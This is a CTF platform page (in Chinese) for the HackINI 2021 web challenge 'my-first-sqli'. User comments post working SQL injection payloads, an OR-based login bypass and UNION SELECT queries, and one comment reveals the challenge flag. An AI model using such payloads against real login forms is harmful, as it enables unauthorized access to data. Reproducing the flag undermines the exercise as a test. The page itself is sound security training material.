my-first-sqliWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 4682
提  示:
描  述:
My First SQL injection!!
评论
xjh888 1年前

这有人用sqlmap我笑他一辈子

回复 0

yituoshi 1年前

Half the truth is often a big lie:shellmates{SQLi_goeS_BrrRR}

回复 0

2200394635 1年前

直接最简单的 1' or '1=1

回复 1

wclc 1年前

为什么注释要用--+才可以,我用的#爆不出来

回复 0
adminhrp 1年前

可能是版本或者sql应用不同,这里用--也可以实现,2个玩意都是sql注释

回复 0

18583024570 1年前

判读闭合符就能出来

回复 0

Y4n9 1年前

1'union select 1,2 --+,密码随便写,通过union select联合查询,看有无回显点

回复 0

hesh 1年前

1' union select * from users order by 2 --+ 密码框随便填一个

回复 1

战斗到底 1年前

sqlmap

回复 0

简单一点点 1年前

1' union select 1,2--+ 就出结果了,还没搞明白为啥。。。

回复 2

Am0s 1年前

简简单单~~

回复 0

WriteUp

image
thb143

0 金币

评分(7)

解题动态

CtrlAltDefy 攻破了该题 1小时前
达瓦达瓦达瓦 攻破了该题 2小时前
ooultron 攻破了该题 3小时前
NIUN 攻破了该题 12小时前
6973lb 攻破了该题 13小时前
路西法法 攻破了该题 15小时前
senxiang 攻破了该题 16小时前
v1v1 攻破了该题 17小时前
ItzStarsWolf 攻破了该题 18小时前
zero1999 攻破了该题 18小时前
19955077258 攻破了该题 22小时前
alaka 攻破了该题 22小时前
Mien 攻破了该题 23小时前
dantedr 攻破了该题 1天前
wangjunbuo2022 攻破了该题 1天前
2489258420 攻破了该题 1天前
wangyihao 攻破了该题 1天前
Buktop 攻破了该题 1天前
wywitkey 攻破了该题 1天前
bzhb 攻破了该题 1天前
问题反馈